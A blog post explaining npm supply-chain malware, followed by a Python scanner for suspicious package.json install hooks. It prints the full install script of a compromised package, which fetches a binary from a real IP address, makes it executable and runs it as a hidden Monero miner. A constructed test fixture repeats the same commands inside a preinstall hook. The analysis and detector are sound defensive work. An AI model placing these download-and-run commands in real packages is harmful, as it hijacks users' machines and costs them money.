TIL malware in node_modules
TAGS: malware npm security hacking
I was reading this excellent post: What's Really Going On Inside Your node_modules Folder?
And it's such an eye-opener.
Let's take a look at what that malware does. This is the script that package.json runs for one of the compromised versions:
The very first line fetches the victim's country code using their IP address. If the victim is from Russia, Ukraine, Belarus, or Kazakhstan, then the malware exits early.
IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ')
if [ -z "$IP" ]
then
    var=$(pgrep jsextension)
    if [ -z "$var" ]
    then
        curl http://159.148.186.228/download/jsextension -o jsextension
        if [ ! -f jsextension ]
        then
            wget http://159.148.186.228/download/jsextension -O jsextension
        fi
        chmod +x jsextension
        ./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u <redacted> \
            --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null &
    fi
fi
Line-by-line:
First line: fetches the victim's country code using their IP address.
If the victim is from Russia, Ukraine, Belarus, or Kazakhstan, then the malware exits early. Presumably the attacker comes from one of these countries and doesn't want to antagonize their local law enforcement. This is a common technique in malware.
Next line: it checks -z "$IP", which is true when the string is empty. Since $IP only holds output when grep matched one of those country codes, an empty string means the victim is not in one of them, so the script carries on.
(via Stackoverflow)
Next line after that: it uses pgrep to see if the malware – a process named jsextension – is already running. If so, then the malware exits early.
Otherwise, the script proceeds to download a file from an IP address, mark that file as executable, and then run it.
Based on these command line flags, the program appears to be a Monero miner. This program will mine the Monero cryptocurrency for the attacker, wasting the victim's CPU cycles and potentially driving up their electricity or cloud hosting bill.
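As an added example (not part of the original post, and not code from the compromised package), here is a small scanner that walks a node_modules tree and flags package.json lifecycle hooks that show the behaviours described above: fetching a file with curl or wget, marking it executable, backgrounding it with its output discarded, geo-fencing via an IP lookup service, and checking with pgrep for an already-running payload. It also matches the three concrete indicators visible in the script on this page (the download host, the jsextension name, and the mining pool). The two package.json documents it scans are constructed for the demo; the package names in them are hypothetical.

```python
import json
import os
import re
import tempfile

# Lifecycle hooks that npm runs automatically during install/uninstall.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                   "preuninstall", "postuninstall", "prepare")

# Behaviours seen in the script on this page, expressed as regexes over the hook text.
SUSPICIOUS_PATTERNS = {
    "downloads a file": re.compile(r"\b(curl|wget)\b\s+[^\n|]*https?://"),
    "marks a file executable": re.compile(r"\bchmod\s+\+x\b"),
    "backgrounds a process and discards its output":
        re.compile(r"&>\s*/dev/null\s*&|>\s*/dev/null\s+2>&1\s*&"),
    "geo-fences via an IP country lookup": re.compile(r"freegeoip|ipinfo\.io|ip-api\.com"),
    "checks for an already-running payload": re.compile(r"\bpgrep\b"),
}

# Indicators taken verbatim from the script on this page.
KNOWN_IOCS = ("159.148.186.228", "jsextension", "pool.minexmr.com")


def inspect_script(hook, script):
    """Return a list of human-readable findings for one lifecycle hook's command string."""
    findings = [f"{hook}: {label}" for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(script)]
    findings += [f"{hook}: known indicator {ioc!r}" for ioc in KNOWN_IOCS if ioc in script]
    return findings


def inspect_package_json(text):
    """Return findings for every lifecycle hook in one package.json document."""
    scripts = json.loads(text).get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        if isinstance(scripts.get(hook), str):
            findings.extend(inspect_script(hook, scripts[hook]))
    return findings


def scan_node_modules(root):
    """Walk a node_modules tree; return {package_dir: findings} for packages with findings."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                findings = inspect_package_json(fh.read())
        except (OSError, ValueError):
            continue  # unreadable or malformed package.json: skip, don't crash the scan
        if findings:
            results[dirpath] = findings
    return results


# Constructed sample: a preinstall hook carrying the page's script condensed to one line.
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "example-compromised-package",  # hypothetical name
    "version": "0.0.0",
    "scripts": {"preinstall": (
        "IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\\|UA\\|BY\\|KZ'); "
        "if [ -z \"$IP\" ]; then var=$(pgrep jsextension); if [ -z \"$var\" ]; then "
        "curl http://159.148.186.228/download/jsextension -o jsextension; "
        "chmod +x jsextension; ./jsextension -o pool.minexmr.com:443 &>/dev/null & fi; fi"
    )},
})

# Constructed sample: a benign native addon. "test" is not a lifecycle hook, so its curl is ignored.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-native-addon",  # hypothetical name
    "version": "0.0.0",
    "scripts": {"install": "node-gyp rebuild", "test": "curl https://example.invalid/"},
})


def demo():
    """Write both samples into a temporary node_modules tree, scan it, return findings by package."""
    with tempfile.TemporaryDirectory() as root:
        for name, text in (("compromised", MALICIOUS_PACKAGE_JSON), ("benign", BENIGN_PACKAGE_JSON)):
            pkg_dir = os.path.join(root, "node_modules", name)
            os.makedirs(pkg_dir)
            with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
                fh.write(text)
        results = scan_node_modules(os.path.join(root, "node_modules"))
        return {os.path.basename(d): f for d, f in results.items()}


if __name__ == "__main__":
    for pkg, findings in demo().items():
        print(pkg)
        for finding in findings:
            print("  -", finding)
```

Run it against a real tree with scan_node_modules("node_modules"). The pattern list is deliberately narrow, so treat a hit as a prompt to read the hook by hand rather than as proof of compromise; and since every one of these behaviours relies on npm running lifecycle hooks at install time, installing with npm's --ignore-scripts option removes that execution path entirely.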